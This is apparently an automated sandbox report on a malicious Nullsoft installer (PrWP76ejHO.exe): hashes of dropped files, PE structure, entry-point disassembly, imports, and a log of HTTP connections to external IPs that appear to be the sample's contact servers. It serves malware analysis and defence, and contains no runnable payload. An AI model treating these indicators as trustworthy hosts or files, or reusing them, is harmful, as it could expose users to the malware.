                                          Size (bytes):36510
                                          Entropy (8bit):2.0994747264122124
                                          Encrypted:false
                                          SSDEEP:192:Z5bhE6b5VtOGJNqajSWW6kekyPPzU+sFezyJSbH03F:bhE6bngGnjEe9wFeo
                                          MD5:262A2F0165598CB8C1F089568D15DAC8
                                          SHA1:84BAB5E35242AA585E97DAFC3EFAE51723E8546A
                                          SHA-256:F279E69F1224E8C691922D0B2D94300A1C600BFA8C19CCBF04B9C772CC774CFE
                                          SHA-512:667B3C1CB3B06A470B77FC668C289DEF5A079FF050A3E99720280B07F04D852D6920AFC9B93B22D99F72DDBC7FE9A0CF1ADE7E36E2D812E11974303816F06F47
                                          Malicious:false
                                          Preview:MDMP....... ..........c........................h................#..........T.......8...........T................}...........................................................................................U...........B..............GenuineIntelW...........T..............c............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8332
                                          Entropy (8bit):3.702271813703967
                                          Encrypted:false
                                          SSDEEP:192:Rrl7r3GLNiPC36NMCIgRj6YqhdSUmncugmfAqgS+2CprG89bxRcsfmzBm:RrlsNiPi6NMCIkj6Y8dSUmcugmfAqgSQ
                                          MD5:99775E557955AA9043F52F99B06CBFF8
                                          SHA1:8EB88504C9A5828A9E6E48A7B4A2AFF8289E9F55
                                          SHA-256:C05FE079520B71127C0B907EB55C0B959D6E915B6183DC51E5561D91E03E4144
                                          SHA-512:D4A198D5F33EDDF54BBBC10C9FD12855EA394A6DB3A37614CD64638D52AE8028FF20C6046902F56BA5D34B9A3CAA1F32A952CFAA8789F738587639A790F92E61
                                          Malicious:false
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.6.4.<./.P.i.d.>.......
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4588
                                          Entropy (8bit):4.478340495331477
                                          Encrypted:false
                                          SSDEEP:48:cvIwSD8zsqJgtWI9JVWgc8sqYjz8fm8M4J62ZFxQ+q8+mDB+++d:uITf4OkgrsqYMJRtQsDc++d
                                          MD5:8C38EA0ACD36EC05355658D475637FF4
                                          SHA1:3485C2B4747A68A67A90331589B86F03B5E20CD5
                                          SHA-256:02F2D88DC261B7B05CF0DA2D91CD419B5FB6F8AF54D5B8B5CA8ED1B58879F860
                                          SHA-512:EB4818785BD72214D2EA8AED23E561A884492F3479AF713A9C4266A3B6E38CC225F8B47B6348249FF43876C1990BBFC113265FF37F25CA0123577F73B9E23B2F
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1802612" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                          Process:C:\Windows\SysWOW64\ipconfig.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                          Category:dropped
                                          Size (bytes):94208
                                          Entropy (8bit):1.2882898331044472
                                          Encrypted:false
                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\PrWP76ejHO.exe
                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):125440
                                          Entropy (8bit):6.283809308716995
                                          Encrypted:false
                                          SSDEEP:3072:6sqyHK7EF9cU5FO/hcf9hUnBZFXBultTL6OhiF:BHK7o9W5uhSFXEY
                                          MD5:2B4B3369E04DEDD66517641DB0F5A8AB
                                          SHA1:A5E482597F6F2D68250A4EB28911683E50FAC4DE
                                          SHA-256:A4C4BF78E737CCADBABF71B57E5676A846D9ADFC5442344EDA8267325223B964
                                          SHA-512:67EB46AB147AD92DB741B60F851A78B6BF88F2DA93601542EE67D4FAAD448CECA73938207F5DAEB0153D5D2C1C84A64949CD7856F404C0781C4E9633727354CC
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 27%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..............................2......2......2................v..*......*.t....*......Rich...........PE..L....h.c.................f..........9.............@..........................@.......................................................0.............................. ...............................@...@............................................text....e.......f.................. ..`.rdata...k.......l...j..............@..@.data...(+..........................@....gfids....... ......................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\PrWP76ejHO.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):189952
                                          Entropy (8bit):7.998520046706668
                                          Encrypted:true
                                          SSDEEP:3072:lfffffffffffff01MFDR7elXwjs6LDZf5X2a2GdUbA1CRe7vDIJGc4U9WKoCaAdY:lfffffffffffff3JexZcZV2a2GdPokvx
                                          MD5:AE2C848F5A91F0EEFBCFAECB3660089D
                                          SHA1:A280F4205AABBCADC444FD983207E41A5871784E
                                          SHA-256:72B7C4D8E791EA9A4A34BA3626C1FF4BE294988650E960C7F7ED18CA90847098
                                          SHA-512:66B79443D897DAB52B4D5FF19D790FDCA1C2A070B481C201265988B490770747B83F3888CBC5B2A07ECA8CA1B90008DC33F615126B3F73E419D2484B9B487198
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\PrWP76ejHO.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):330372
                                          Entropy (8bit):7.553183899203401
                                          Encrypted:false
                                          SSDEEP:6144:MMifffffffffffff3JexZcZV2a2GdPokvDIJGc4U9HV6Epw5Da3iffuHK7o9W5ui:Mffffffffffffff3YxZa4qokrIIc4Woy
                                          MD5:5D51FD4B6E844AE16602B13E24A93BF8
                                          SHA1:9F071B7B261C17DA0862C4029EB9530A9912EFB1
                                          SHA-256:501989AB0623183D2CA2B4E4BCFC74B8C865A03E55899889B92E7D81957B25E0
                                          SHA-512:6E0279EEADB8E9604FA944A5EB5D4E673F0667E79983C451E0A00B403D28062AA4F2AA60773269DFC3A23AC62F6927743565907A1D8CD33994CB267371F1DF5B
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\PrWP76ejHO.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):8152
                                          Entropy (8bit):6.20728143173311
                                          Encrypted:false
                                          SSDEEP:192:tEnLkq8ChRVmucs9kMZk1thk1XRKjR5SeOyrkIBrzG6iyw:4LkqfRVLSMZkVQXWsbUKn
                                          MD5:64C3C26CE45E8C154D7CA9FEBB385997
                                          SHA1:D606B7D8CD6E3046992ED26D869E47AFD2A390AE
                                          SHA-256:A2F81AB67DA82F261E6979CAF0DF1E366499015C6ABABBD1A020601D4FB58185
                                          SHA-512:7A61FAC51B7ABD0D20D7EF06161BD417D120181E67E3CEF891BB6D149B0BA656B0F9229CCE9ED77B00B9CE37A9FB871B355EFF925D904FB4DDE26288370E3AB3
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Local\Temp\iscan.exe
                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):125440
                                          Entropy (8bit):6.283809308716995
                                          Encrypted:false
                                          SSDEEP:3072:6sqyHK7EF9cU5FO/hcf9hUnBZFXBultTL6OhiF:BHK7o9W5uhSFXEY
                                          MD5:2B4B3369E04DEDD66517641DB0F5A8AB
                                          SHA1:A5E482597F6F2D68250A4EB28911683E50FAC4DE
                                          SHA-256:A4C4BF78E737CCADBABF71B57E5676A846D9ADFC5442344EDA8267325223B964
                                          SHA-512:67EB46AB147AD92DB741B60F851A78B6BF88F2DA93601542EE67D4FAAD448CECA73938207F5DAEB0153D5D2C1C84A64949CD7856F404C0781C4E9633727354CC
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 27%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..............................2......2......2................v..*......*.t....*......Rich...........PE..L....h.c.................f..........9.............@..........................@.......................................................0.............................. ...............................@...@............................................text....e.......f.................. ..`.rdata...k.......l...j..............@..@.data...(+..........................@....gfids....... ......................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.686417648025134
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:PrWP76ejHO.exe
                                          File size:318559
                                          MD5:db102a67350060a1e967aef81118f18d
                                          SHA1:a3131a3df17a154e41c09973ca8a9aabac29929e
                                          SHA256:98420cf47e19574739cff3f1f74bd3c6c70e103d0b28040b64fd3c77588c7ee7
                                          SHA512:daad205a305f7774164f0ed2298501e8a4cade236b93f63db31e40713a66a379145a2e9ca861f8c337dcb5e3a29cbe50b1b77589941e1e1c7090c950766de7a3
                                          SSDEEP:6144:NBn0ph65gGns2YvYPUaC55QAU4wVdsTbUi:EpoGHiO554Nbwb3
                                          TLSH:D664CD762170EF66D91F3830C86382F69667DE0ADE1457DFB6903E1A7832192F932643
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.*]...RF..RG.pRF.*]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........
                                          Icon Hash:d08eb292f2e89ce2
                                          Entrypoint:0x40324f
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:ab6770b0a8635b9d92a5838920cfe770
                                          Instruction
                                          sub esp, 00000180h
                                          push ebx
                                          push ebp
                                          push esi
                                          push edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+1Ch], ebx
                                          mov dword ptr [esp+14h], 00409130h
                                          xor esi, esi
                                          mov byte ptr [esp+18h], 00000020h
                                          call dword ptr [004070B8h]
                                          call dword ptr [004070B4h]
                                          cmp ax, 00000006h
                                          je 00007F5EF0F47EB3h
                                          push ebx
                                          call 00007F5EF0F4ACA1h
                                          cmp eax, ebx
                                          je 00007F5EF0F47EA9h
                                          push 00000C00h
                                          call eax
                                          push 004091E0h
                                          call 00007F5EF0F4AC22h
                                          push 004091D8h
                                          call 00007F5EF0F4AC18h
                                          push 004091CCh
                                          call 00007F5EF0F4AC0Eh
                                          push 0000000Dh
                                          call 00007F5EF0F4AC71h
                                          push 0000000Bh
                                          call 00007F5EF0F4AC6Ah
                                          mov dword ptr [00423F84h], eax
                                          call dword ptr [00407034h]
                                          push ebx
                                          call dword ptr [00407270h]
                                          mov dword ptr [00424038h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+34h]
                                          push 00000160h
                                          push eax
                                          push ebx
                                          push 0041F538h
                                          call dword ptr [00407160h]
                                          push 004091C0h
                                          push 00423780h
                                          call 00007F5EF0F4A8A1h
                                          call dword ptr [004070B0h]
                                          mov ebp, 0042A000h
                                          push eax
                                          push ebp
                                          call 00007F5EF0F4A88Fh
                                          push ebx
                                          call dword ptr [00407144h]
                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73cc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2d000 | 0x9ee0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5c4a | 0x5e00 | False | 0.659906914893617 | data | 6.410763775060762 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x115e | 0x1200 | False | 0.4466145833333333 | data | 5.142548180775325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1b078 | 0x600 | False | 0.455078125 | data | 4.2252195571372315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x25000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2d000 | 0x9ee0 | 0xa000 | False | 0.1594970703125 | data | 3.5990213744393147 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2d280 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 11811 x 11811 px/m | English | United States
RT_ICON | 0x314a8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 11811 x 11811 px/m | English | United States
RT_ICON | 0x33a50 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 11811 x 11811 px/m | English | United States
RT_ICON | 0x34af8 | 0x1045 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x35b40 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 11811 x 11811 px/m | English | United States
RT_ICON | 0x364c8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 11811 x 11811 px/m | English | United States
RT_DIALOG | 0x36930 | 0x100 | data | English | United States
RT_DIALOG | 0x36a30 | 0x11c | data | English | United States
RT_DIALOG | 0x36b50 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x36bb0 | 0x5a | data | English | United States
RT_MANIFEST | 0x36c10 | 0x2cc | XML 1.0 document, ASCII text, with very long lines (716), with no line terminators | English | United States
DLL | Import
KERNEL32.dll | SetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
USER32.dll | GetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 30, 2022 02:22:22.784383059 CET | 49710 | 80 | 192.168.2.3 | 195.110.124.133
Nov 30, 2022 02:22:22.842713118 CET | 80 | 49710 | 195.110.124.133 | 192.168.2.3
Nov 30, 2022 02:22:22.842864037 CET | 49710 | 80 | 192.168.2.3 | 195.110.124.133
Nov 30, 2022 02:22:22.848509073 CET | 49710 | 80 | 192.168.2.3 | 195.110.124.133
Nov 30, 2022 02:22:22.906733036 CET | 80 | 49710 | 195.110.124.133 | 192.168.2.3
Nov 30, 2022 02:22:22.911145926 CET | 80 | 49710 | 195.110.124.133 | 192.168.2.3
Nov 30, 2022 02:22:22.914767981 CET | 80 | 49710 | 195.110.124.133 | 192.168.2.3
Nov 30, 2022 02:22:22.914897919 CET | 49710 | 80 | 192.168.2.3 | 195.110.124.133
Nov 30, 2022 02:22:22.914952993 CET | 49710 | 80 | 192.168.2.3 | 195.110.124.133
Nov 30, 2022 02:22:22.973588943 CET | 80 | 49710 | 195.110.124.133 | 192.168.2.3
Nov 30, 2022 02:22:27.959201097 CET | 49711 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:28.016766071 CET | 80 | 49711 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:28.018054008 CET | 49711 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:28.018217087 CET | 49711 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:28.075455904 CET | 80 | 49711 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:28.078820944 CET | 80 | 49711 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:28.078874111 CET | 80 | 49711 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:28.079058886 CET | 49711 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:29.031352043 CET | 49711 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:30.171621084 CET | 49712 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:30.229381084 CET | 80 | 49712 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:30.229496002 CET | 49712 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:30.229651928 CET | 49712 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:30.287029982 CET | 80 | 49712 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:30.288594961 CET | 80 | 49712 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:30.288676023 CET | 80 | 49712 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:30.288764954 CET | 49712 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:31.238483906 CET | 49712 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:32.250713110 CET | 49713 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:32.308607101 CET | 80 | 49713 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:32.308743954 CET | 49713 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:32.309048891 CET | 49713 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:32.366486073 CET | 80 | 49713 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:32.366560936 CET | 80 | 49713 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:32.366606951 CET | 80 | 49713 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:32.366653919 CET | 80 | 49713 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:32.373341084 CET | 80 | 49713 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:32.373418093 CET | 80 | 49713 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:32.373527050 CET | 49713 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:33.312879086 CET | 49713 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:34.328996897 CET | 49714 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:34.387155056 CET | 80 | 49714 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:34.387286901 CET | 49714 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:34.387420893 CET | 49714 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:34.445230007 CET | 80 | 49714 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:34.450206041 CET | 80 | 49714 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:34.450313091 CET | 80 | 49714 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:34.450730085 CET | 49714 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:34.451093912 CET | 49714 | 80 | 192.168.2.3 | 81.88.48.71
Nov 30, 2022 02:22:34.509608984 CET | 80 | 49714 | 81.88.48.71 | 192.168.2.3
Nov 30, 2022 02:22:39.630742073 CET | 49715 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:39.798660994 CET | 80 | 49715 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:39.798887014 CET | 49715 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:39.798988104 CET | 49715 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:39.966043949 CET | 80 | 49715 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:39.973978996 CET | 80 | 49715 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:39.974056005 CET | 80 | 49715 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:39.974246979 CET | 49715 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:40.820147991 CET | 49715 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:41.832281113 CET | 49716 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:41.999494076 CET | 80 | 49716 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:42.001230001 CET | 49716 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:42.001358032 CET | 49716 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:42.168423891 CET | 80 | 49716 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:42.176863909 CET | 80 | 49716 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:42.176980972 CET | 80 | 49716 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:42.177134991 CET | 49716 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:43.016860962 CET | 49716 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:44.035156012 CET | 49717 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:44.203669071 CET | 80 | 49717 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:44.203809977 CET | 49717 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:44.204161882 CET | 49717 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:44.372004032 CET | 80 | 49717 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:44.372042894 CET | 80 | 49717 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:44.372071028 CET | 80 | 49717 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:44.372103930 CET | 80 | 49717 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:44.372131109 CET | 80 | 49717 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:44.379828930 CET | 80 | 49717 | 50.87.143.200 | 192.168.2.3
